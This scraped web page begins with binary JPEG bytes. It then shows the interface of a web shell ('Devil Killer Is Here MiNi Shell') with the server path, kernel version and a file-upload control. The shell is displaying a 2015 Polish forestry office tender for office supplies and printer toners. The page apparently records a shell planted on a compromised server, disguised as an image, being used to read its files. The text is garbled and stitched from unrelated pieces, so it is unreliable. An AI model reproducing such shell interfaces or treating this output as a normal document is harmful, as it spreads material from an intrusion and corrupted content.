JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150128/19924-N-2015.html

<p class="kh_header"><b>Ruszów: Dostawa artykułów biurowych</b><br>
<b>Numer ogłoszenia: 19924 - 2015; data zamieszczenia: 28.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Ruszów , ul. Leśna 2, 59-950 Ruszów, woj. dolnośląskie, tel. 75 7714339, faks 75 7714468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ruszow.wroclaw.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w okresie trwania umowy, według wymagań Zamawiającego, dostawa artykułów biurowych wyszczególnionych poniżej:
Papier ksero A4 POLjet (prime) 80g/m2 500 arkuszy lub równoważ.	ryza	500
Papier ksero A3 POLjet (prime) 80g/m2  500 arkuszy lub równoważ.	ryza	5
Papier ksero A4 NAVIGATOR 160g  500 arkuszy lub równoważny  	ryza	2
Papier do faxu w rolce 210*30/12mm	rolka	12
Papier pakowy brązowy 10m/1m- rolka	rolka	1
Sznurek pakowy  100-120 m 	szt.	1
Blok listowy A4/ 100 kartkowy, kratka ,wyrywane kartki , klejony na górze	szt.	3
Kalka biurowa A4/100 arkuszy 	szt.	1
Brulion A4/96 kartek w twardej oprawie-kratka	szt.	5
Brulion A5/96 kartek w twardej oprawie -kratka	szt.	5
Zeszyt A5/32 kartki-kratka, okładka kartonowa	szt.	3
Zeszyt A5/60 kartki-kratka, okładka kartonowa	szt.	3
Kostka biurowa klejona 8,3x8,3cm,wys.7,5 cm mix. kolorów	szt.	5
Bloczki samoprzylepne żółte 76x76 mm/100 karteczek	szt.	50
Koperta biała bez okienka C6 samoklejąca - 1000 szt. 	karton	3 
Koperta biała bez okienka C5 samoklejąca - 500 szt. 	karton	3
Koperta biała bez okienka C4 samoklejąca - 250 szt. 	karton	4
Koperta biała z folią bąbelkową format A5	szt.	30
Koperta biała z folią bąbelkową format A4	szt.	30
Koperta biała z folią bąbelkową format A3	szt.	30
Koperta biała z folią bąbelkową ok. 49 cmx36 cm	szt.	20
Segregator A4/szerokość grzbietu 75 mm(powlekany, z dźwignią 
z dociskiem, z wymienną etykietą grzbietową) kolor	
szt.	
120
Segregator A4/szerokość grzbietu 50 mm(powlekany, z dźwignią z dociskiem 
z wymienną etykietą grzbietową) kolor	szt.	150
Skoroszyt PCV A4 twardy (zapisywalny pasek grzbietowy), wpinany w segregator, kolor	szt.	200
Segregator A4/szerokość grzbietu 40 mm (powlekany,,kolor)	szt.	20
Teczka z gumką A4 kolor, kartonowa	szt.	30
Teczka wiązana A4 kolor kartonowa 	szt.	20
Teczka skrzydłowa A4  na rzepa, powlekana  -kolor	szt.	3
Teczka pudełko A4 z rączką i zamkiem, powlekana -kolor	 szt.	1
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 5mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 10mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 13mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 16mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 20mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 24mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 28mm	szt.	5
Twarda okładka kanałowa z okleiny o fakturze tkaniny A4 32mm	szt.	5
Okładka przezroczysta  PCV do bindowania (folia sztywna) A4 kolor (100 szt.)	opak.	1
Okładka karton do bindowania A4 kolor (100 szt.)	opak.	1
Okładka skóropodobna do bindowania A4 kolor (100 szt.)	opak.	1
Plastikowe grzbiety do bindowania 4,5mm/kolor	szt.	20
Plastikowe grzbiety do bindowania 8mm/kolor	szt.	20
Plastikowe grzbiety do bindowania 12mm/kolor	szt.	20
Plastikowe grzbiety do bindowania 18mm/kolor	szt.	20
Plastikowe grzbiety do bindowania 25mm/kolor	szt.	20
Plastikowe grzbiety do bindowania 32mm z zatrzaskiem/kolor	szt.	20
Plastikowe grzbiety do bindowania 45mm z zatrzaskiem/kolor	szt.	20
Plastikowe grzbiety do bindowania 51mm z zatrzaskiem/kolor	szt.	20
Grzbiet zaciskowy kolor (od 30 do 60 kartek) - 100 szt.	opak.	1
Koszulka na dokumenty A4 przeźroczysta (100 szt.)	opak.	15
Woreczki strunowe 140150 35 qm/100 szt	opak.	2
Obwoluta A4 (ofertówka)  sztywna, przezroczysta, otwierana od góry i z boku 	szt.	30
Długopis z automatycznie chowanym  wkładem /niebieski	szt.	50
Długopis z automatycznie chowanym wkładem czarny, czerwony, zielony	szt.	30
Długopis żelowy niebieski lub równoważny	szt.	30
Długopis żelowy czarny, czerwony, zielony lub równoważny 	szt.	15
Cienkopis STABILO  kolor niebieski ,zielony, czerwony, czarny lub równoważny	szt.	30
Cienkopis STABILO lub równoważny (12 kol.) komplet	kpl	2
Flamastry (12 kol.) komplet	kpl	1
Kreda biała (50 szt.)	opak.	1
61.	Marker permanentny ze  ściętą końcówką, grubość  pisania od 1,5 mm-5mm/ niebieski zielony, czerwony, czarny	szt.	10
62.	Marker permanentny końcówka okrągła - niebieski zielony, czerwony, czarny	szt.	10
63.	Marker do płyt CD/DVD uniwersalna końcówka, kolor: niebieski zielony, czerwony, czarny	szt.	2
64.	Zakreślacz fluorescencyjny końcówka ścięta ,grubość linii pisania 1-5mm/ kolor lub równoważny	szt.	10
65.	Korektor w piórze z metalową końcówką	szt.	1
66.	Korektor w taśmie(długość taśmy od 6-10 m)	szt.	1
67.	Tusz do stempli ręcznych i samotuszujących , wodny 25 ml/zielony	szt.	3
68.	Tusz do stempli ręcznych  i samotuszujących , wodny 25 ml/czarny	 szt.	2
69.	Ołówek biurowy z gumką HB	szt.	10
70.	Temperówka podwójna metalowa	szt.	1
71.	Gumka ołówkowa	szt.	3
72.	Linijka plastikowa, przeźroczysta 20 cm	szt.	2
73.	Linijka plastikowa, przeźroczysta 30 cm	szt.	2
74.	Linijka plastikowa, przeźroczysta 50 cm	szt.	2
75.	Nożyczki biurowo ok. 18,5cm(ostrze tnące ze stali wysokiej jakości, uchwyt plastikowy)	szt.	5
76.	Klej biurowy w sztyfcie 25 g	szt.	1
77.	Klej biurowy w płynie 45 ml	szt.	1
78.	Taśma klejącaok.18 mm x 18 m	szt.	10
79.	Taśma klejąca dwustronnie ok.8mmx10 m	szt.	2
80.	Taśma klejąca dwustronnie ok.50mmx10 m	szt.	2
81.	Taśma klejąca pakowa transparentna ok.48x50	szt.	2
82.	Taśma klejąca pakowa brązowa ok.48x50	szt.	20
83.	Gumki recepturki  ok.1 kg/60 mm	opak.	1
84.	Dziurkacz do 25 kartek z wysuwanym ogranicznikiem	szt.	3
85.	Zszywacz do 20 kartek (24/6)	szt.	3
86.	Rozszywacz	szt.	2
87.	Datownik samotuszujący literowo-cyfrowy	szt.	2
88.	Zszywki metalowe 24/6-1000 szt.	opak.	50
89.	Zszywki metalowe 23/6-1000 szt.	opak.	2
90.	Zszywki metalowe 23/8-1000 szt.	opak.	2
91.	Zszywki  metalowe 23/10-1000 szt.	opak.	2
92.	Zszywki metalowe23/13 1000 szt.	opak.	2
93.	Zszywki metalowe 23/15-1000 szt.	opak.	2
94.	Spinacze biurowe okrągłe 33-100 szt	opak.	2
95	Spinacze biurowe okrągłe 70-50 szt	opak.	2
96.	Pinezki biurowe-50 szt	opak.	5
97.	Pineski do tablic korkowych, główki z plastiku, różne kolory (pudełko -50 szt)	opak.	3
98.	Pineski do tablic magnetycznych	opak.	2
99.	Klipy metalowe 12mm/ 12 szt.	opak.	30
100.	Klipy metalowe 19mm/ 12 szt	opak.	30
101.	Klipy metalowe 25mm/ 12 szt.	opak.	30
102.	Klipy metalowe 41mm/ 12 szt.	opak.	30
103.	Klipy metalowe 51mm/ 12 szt.	opak.	30
104.	Klips do spinania dokumentów  plastikowy, (50 szt.) tzw. wąsy	opak.	20
105	Kalkulator 14-pozycyjny wyświetlacz, podwójna pamięć, zaokrąglanie wyników, korekta ostatniej cyfry, klawisz podwójnego zera, obliczanie marży) ok.  158x203x31 mm	szt.	2
106.	Nośnik danych DVD-R 4,7 GB	szt.	50
107.	Nośnik danych CD-R 700 MB	szt.	50
108.	Pudełko na płytę DVD-R/CD-R	szt.	20
109	Worki 160 lit. bardzo mocne(rolka -10 szt.)	rolka	200
110.	Worki 240 lit. bardzo mocne (rolka -10 szt)	rolka	10
111.	Toner do drukarki HP 78A s/czarny	szt.	3
112.	Toner do drukarki  LaserJet M 1319f MFP (czarny)	szt.	1
113.	Toner do drukarki  HP LaserJet 4350 dtn (czarny)	szt.	2 
114.	Toner do drukarki   HP Color LaserJet CM1312 nfi MFP/czarny	szt.	3
115.	Toner do drukarki   HP Color LaserJet CM1312 nfi MFP/kolor	szt.	6
116.	Toner do drukarki  Ricoh Aficio SPC 232SF/czarny	szt.	3
117.	Toner do drukarki  Ricoh Aficio SPC 232SF/kolor	szt.	8
118.	Toner do drukarki    HP Color LaserJet 5550 dtn/czarny	szt.	3
119.	Toner do drukarki    HP Color LaserJet 5550 dtn/kolor	szt.	6
120.	Zespół utrwalający do drukarki HP Color LaserJet 5550 dtn	kpl	1
121.	Toner do drukarki    Canon C2020i /czarny	szt.	5
122.	Toner do drukarki    Canon C2020i/kolor	szt.	9
123.	Toner do drukarki Nashuatec MP C2550 Aficio /czarny	szt.	10
124.	Toner do drukarki    Nashuatec MP C2550 Aficio/kolor	szt.	15
125.	Toner do drukarki     Laser Jet Pro CM 1415 fnw  color MFP/czarny	szt.	10
126.	Toner do drukarki     Laser Jet Pro CM 1415 fnw  color MFP/kolor	szt.	24
127.	Toner do urządzenia wielofunkcyjnego      hp M476 dnColor Laser Jet Pro MFP /czarny	szt.	10
128.	Toner do urządzenia wielofunkcyjnego hp M476 dnColor Laser Jet Pro MFP (kolor)	szt.	20
129.	MM -  przesunięcie międzymagazynowe, samokopiujące , A5-bl.	szt.	5
130.	ZW -  zwrot materiału samokopiujący, A4/6pozycyjne -bloczek	szt.	2
131.	Dziennik budowy A4- oprawa kartonowa	szt.	3
132.	Książka obiektu budowlanego A4, twarda oprawa 	szt.	2
133.	Księga meldunkowa A4	szt.	1
134.	Terminarz na rok 2016 A5, w twardej, skóropodobnej oprawie/kolor	szt.	25
135	Pióro kulkowe/4 kolory	szt.	8
136.	Pióro atramentowe	szt.	5
137.	Zestaw (kpl)długopis+pióro	szt.	2
138.	Kalendarz ścienny trójdzielny (3m-ce) rok 2016	szt.	30
139. 	Pieczątka automatyczna mała	szt.	5
140.	 Pieczątka automatyczna duża	szt.	5
141. 	Przekładki do segregatorów A4	opak.	12
142.	Karteczki indeksujące małe	szt.	15
143.	Pojemnik na zużyty toner do drukarki Xerox 008R 13089	szt.	2
144.	Toner do drukarki Xerox 008R 13089 czarny	szt.	1
145.	Toner do drukarki Xerox 008R 13089 kolor	szt.	3
146.	Toner do drukarki Samsung CLP-325 W czarny	szt.	1
147.	Toner do drukarki Samsung CLP-325 W kolor	szt.	3
148.	Papier ksero A4 ekologiczny/ 100% recycled, 210x297 mm  80g/m2	ryz.	50
149.	Cienkopis PILOT balgrip05/kolor lub równoważny	szt.	8
150.	Tablica korkowa nie mniejsza niż 65 cmx 45 cm	szt	1
151.	Toner do urządzenia wielofunkcyjnego BROTHER DCP-9270CDN (kpl - kolory i czarny) 	kpl	6
Zamawiający wymaga dostawy oryginalnych tonerów producenta (nie zamienników).
Termin dostawy wynosi do 24 godzin od daty zgłoszenia telefonicznego zapotrzebowania na dany zakres artykułów będących przedmiotem zamówienia.
Zakres zamówienia obejmuje dowóz oraz rozładunek i wniesienie/doniesienie artykułów biurowych w miejsce wskazane przez Zamawiającego, zlokalizowane w budynku biurowo-administracyjnym w Ruszowie przy ul. Leśnej 2.
Dostawy mogą odbywać się w dni robocze w godzinach od 7.00 do 15.00.
Zamawiający zastrzega sobie prawo nie zrealizowania całego zakresu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających będzie powtórzenie przedmiotu zamówienia podstawowego o wartości nie przekraczającej 20% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.40.00-4, 30.12.51.10-5, 30.14.10.00-9, 30.19.00.00-7, 30.19.20.00-1, 30.19.70.00-6, 30.19.90.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 1 000,00 złotych (słownie: jeden tysiąc
    złotych).
2. Wadium musi zostać wniesione przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy
        dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
        z 2007 r. Nr 42 poz. 275 ze zmianami).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego: PKO BP S.A. Bolesławiec  nr  51 1020 2137 0000 9202 0101 5841  
    z dopiskiem: Wadium - S.270.1.2015 - Dostawa artykułów biurowych.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy
    oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej oraz w formie
    poręczenia udzielonego przez podmioty, o których mowa w pkt. 3.5, należy złożyć w formie 
    oryginału w siedzibie Zamawiającego (sekretariat - pokój nr 20), a kopię załączyć do oferty.
7. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta
    została wybrana jako najkorzystniejsza.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu
    zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed
    upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono
    wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako
    najkorzystniejsza. Wykonawca zobowiązany jest do wniesienia wadium w terminie określonym
    przez  Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi 
    z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty
    prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek
    bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została
     wybrana:
     1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
        w ofercie;
     2) nie wniósł wymaganego zabezpieczenia należytego wykonania przedmiotu umowy;
     3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
         po stronie Wykonawcy.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, który w określonym
    terminie nie złożył wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których
    mowa w pkt. XI SIWZ lub pełnomocnictw, i w odpowiedzi na wezwanie Zamawiającego nie
    złoży ich w wyznaczonym terminie, chyba że udowodni, że wynika to z przyczyn nie leżących
    po jego stronie.
14. W przypadku wniesienia wadium w walucie innej niż PLN, przeliczenie wartości wadium  
    na PLN nastąpi  wg średniego kursu NBP z dnia publikacji ogłoszenia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których zobligowany
    jest Wykonawca, poza złożeniem oświadczenia o spełnieniu warunków udziału w postępowaniu 
    (Załącznik Nr 4 do SIWZ);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których zobligowany
    jest Wykonawca, poza złożeniem oświadczenia o spełnieniu warunków udziału w postępowaniu 
    (Załącznik Nr 4 do SIWZ);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których zobligowany
    jest Wykonawca, poza złożeniem oświadczenia o spełnieniu warunków udziału w postępowaniu 
    (Załącznik Nr 4 do SIWZ);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których zobligowany
    jest Wykonawca, poza złożeniem oświadczenia o spełnieniu warunków udziału w postępowaniu 
    (Załącznik Nr 4 do SIWZ);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których zobligowany
    jest Wykonawca, poza złożeniem oświadczenia o spełnieniu warunków udziału w postępowaniu 
    (Załącznik Nr 4 do SIWZ);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_wroclaw/nadl_ruszow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2015 godzina 12:00, miejsce: Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów
Sekretariat - pokój Nr 21.</p>
